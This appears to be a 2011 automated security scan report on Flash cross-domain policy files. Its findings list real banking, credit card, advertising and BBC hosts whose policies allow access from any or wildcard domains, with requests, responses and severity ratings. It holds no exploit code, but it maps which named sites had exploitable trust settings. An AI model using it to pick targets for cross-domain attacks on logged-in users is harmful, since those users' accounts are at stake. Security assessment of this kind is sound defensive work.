http://americanexpress.122.2o7.net/crossdomain.xml
http://as00.estara.com/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://cctrkom.creditcards.com/crossdomain.xml
http://creditcardscom.112.2o7.net/crossdomain.xml
http://fls.doubleclick.net/crossdomain.xml
http://integrate.112.2o7.net/crossdomain.xml
http://metrics.citibank.com/crossdomain.xml
http://omn.americanexpress.com/crossdomain.xml
http://pixel.33across.com/crossdomain.xml
http://tags.bluekai.com/crossdomain.xml
http://www.creditcards.com/crossdomain.xml
http://feeds.bbci.co.uk/crossdomain.xml
http://googleads.g.doubleclick.net/crossdomain.xml
http://newsrss.bbc.co.uk/crossdomain.xml
http://oc.creditcards.com/crossdomain.xml
http://s46.sitemeter.com/crossdomain.xml
http://www.discovercard.com/crossdomain.xml
https://www.discovercard.com/crossdomain.xml
http://www.wtp101.com/crossdomain.xml
http://www201.americanexpress.com/crossdomain.xml
https://www201.americanexpress.com/crossdomain.xml
http://citi.bridgetrack.com/crossdomain.xml
http://creditcards.citicards.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Fri, 17 Jun 2011 12:04:21 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://americanexpress.122.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://americanexpress.122.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: americanexpress.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:04:44 GMT
Server: Omniture DC/2.0.0
xserver: www419
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.3. http://as00.estara.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as00.estara.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: as00.estara.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:03:49 GMT
Server: Apache
Last-Modified: Thu, 05 May 2011 11:39:26 GMT
Accept-Ranges: bytes
Content-Length: 567
Cache-Control: max-age=2592000
Expires: Sun, 17 Jul 2011 12:03:49 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*.estara.com" />
<allow-access-from domain="*.sh01.de" />
<allow-access-from domain="*.dwsgo.de" />
<allow-access-from domain="*.sosbonnesexcuses.com" />
<allow-access-from domain="*.lagencesecrete.com" />
<allow-access-from domain="*.livefeeds.gr" />
<allow-access-from domain="*.paeiopaliosoxronos.gr" />
<allow-access-from domain="*.kokkinostypos.gr" />
<allow-access-from domain="*" />
...[SNIP]...

4.4. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Sat, 18 Jun 2011 11:59:07 GMT
Date: Fri, 17 Jun 2011 11:59:07 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.5. http://cctrkom.creditcards.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cctrkom.creditcards.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cctrkom.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:35 GMT
Server: Omniture DC/2.0.0
xserver: www433
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.6. http://creditcardscom.112.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://creditcardscom.112.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: creditcardscom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:08 GMT
Server: Omniture DC/2.0.0
xserver: www71
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.7. http://fls.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Thu, 16 Jun 2011 20:44:31 GMT
Expires: Tue, 17 May 2011 18:17:24 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 55180
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.8. http://integrate.112.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://integrate.112.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: integrate.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:04:28 GMT
Server: Omniture DC/2.0.0
xserver: www98
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.9. http://metrics.citibank.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.citibank.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.citibank.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:13:58 GMT
Server: Omniture DC/2.0.0
xserver: www5
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.10. http://omn.americanexpress.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://omn.americanexpress.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: omn.americanexpress.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:04:33 GMT
Server: Omniture DC/2.0.0
xserver: www42
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.11. http://pixel.33across.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"211-1298012459000"
Last-Modified: Fri, 18 Feb 2011 07:00:59 GMT
Content-Type: application/xml
Content-Length: 211
Date: Fri, 17 Jun 2011 11:59:07 GMT
Connection: close
Server: 33XG1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

4.12. http://tags.bluekai.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Fri, 17 Jun 2011 11:58:29 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 14 Jun 2011 21:58:43 GMT
ETag: "6f08145-ca-4a5b323ab4ac0"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

4.13. http://www.creditcards.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:27 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:38 GMT
ETag: "925bac-94-46712311e8a80"
Accept-Ranges: bytes
Content-Length: 148
Vary: Accept-Encoding
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.imgsynergy.com"/>
</cross-domain-policy>

4.14. http://feeds.bbci.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=50
Expires: Fri, 17 Jun 2011 12:32:13 GMT
Date: Fri, 17 Jun 2011 12:31:23 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.15. http://googleads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Thu, 16 Jun 2011 21:25:21 GMT
Expires: Fri, 17 Jun 2011 21:25:21 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 52426
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.16. http://newsrss.bbc.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=111
Expires: Fri, 17 Jun 2011 12:33:13 GMT
Date: Fri, 17 Jun 2011 12:31:22 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.17. http://oc.creditcards.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://oc.creditcards.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: oc.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:08 GMT
Server: Apache
Last-Modified: Fri, 20 Feb 2009 18:56:12 GMT
ETag: "167cd7-e3-4635e34dfcb00"
Accept-Ranges: bytes
Content-Length: 227
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.imgsynergy.com" />
<allow-access-from domain="*.creditcards.com" />
<allow-access-from domain="*.netfiniti.com" />
...[SNIP]...

4.18. http://s46.sitemeter.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://s46.sitemeter.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: s46.sitemeter.com

Response

HTTP/1.1 200 OK
Content-Length: 219
Content-Type: text/xml
Last-Modified: Wed, 25 Oct 2006 21:31:00 GMT
Accept-Ranges: bytes
ETag: "025bdd7cf8c61:8c69"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 17 Jun 2011 11:58:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sitemeter.com" />
</cro
...[SNIP]...

4.19. http://www.discovercard.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.discovercard.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.discovercard.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:31:01 GMT
Server: Apache
Last-Modified: Tue, 18 Nov 2008 14:36:53 GMT
Accept-Ranges: bytes
Content-Length: 1882
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="discovercard.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.discovercard.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.abc.com"/>
<allow-access-from domain="ll.media.abc.com"/>
<allow-access-from domain="abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="dynamic.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="dynamic.myabcdev.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.myabcdev.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.media.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.media.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.static.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.static.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.static.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.static.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="verdict.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="verdict.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.verdict.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cbs.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nbc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nbcuni.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.clearspring.com" secure="false"/>
...[SNIP]...

4.20. https://www.discovercard.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.discovercard.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:43 GMT
Server: Apache
Last-Modified: Tue, 18 Nov 2008 14:36:53 GMT
Accept-Ranges: bytes
Content-Length: 1882
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="discovercard.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.discovercard.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.abc.com"/>
<allow-access-from domain="ll.media.abc.com"/>
<allow-access-from domain="abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="dynamic.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="dynamic.myabcdev.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.myabcdev.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.media.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.media.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.static.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.static.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.static.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.static.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="verdict.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="verdict.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.verdict.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cbs.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nbc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nbcuni.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.clearspring.com" secure="false"/>
...[SNIP]...

4.21. http://www.wtp101.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wtp101.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/xml
Date: Fri, 17 Jun 2011 12:12:24 GMT
ETag: 1300114347320
LastModified: Mon, 14 Mar 2011 14:52:27 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 320
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.adap.tv"/>
<allow-access-from domain="*.nieuwefabia.nl"/>
<allow-access-from domain="*.denieuwefabia.nl"/>
...[SNIP]...

4.22. http://www201.americanexpress.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www201.americanexpress.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www201.americanexpress.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:03 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 31 Oct 2006 05:40:47 GMT
ETag: "3057-122-d404f5c0"
Accept-Ranges: bytes
Content-Length: 290
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aexp.com" secure="true" />

...[SNIP]...
<allow-access-from domain="*.americanexpress.com" secure="true" />
...[SNIP]...

4.23. https://www201.americanexpress.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www201.americanexpress.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www201.americanexpress.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:48 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 31 Oct 2006 05:39:34 GMT
ETag: "3057-122-cfab1180"
Accept-Ranges: bytes
Content-Length: 290
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aexp.com" secure="true" />

...[SNIP]...
<allow-access-from domain="*.americanexpress.com" secure="true" />
...[SNIP]...

4.24. http://citi.bridgetrack.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: citi.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 508
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Fri, 17 Jun 2011 12:14:01 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="citi.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="172.16.181.69" />
   <allow-access-from domain="172.16.180.191" />
   <allow-access-from domain="banking.citibank.com" />
   <allow-access-from domain="sec-citi.bridgetrack.com" />
   <allow-access-from domain="citi-preview.bridgetrack.com" />
   <allow-access-from domain="www.sapientprojects.com" />
...[SNIP]...

4.25. http://creditcards.citicards.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

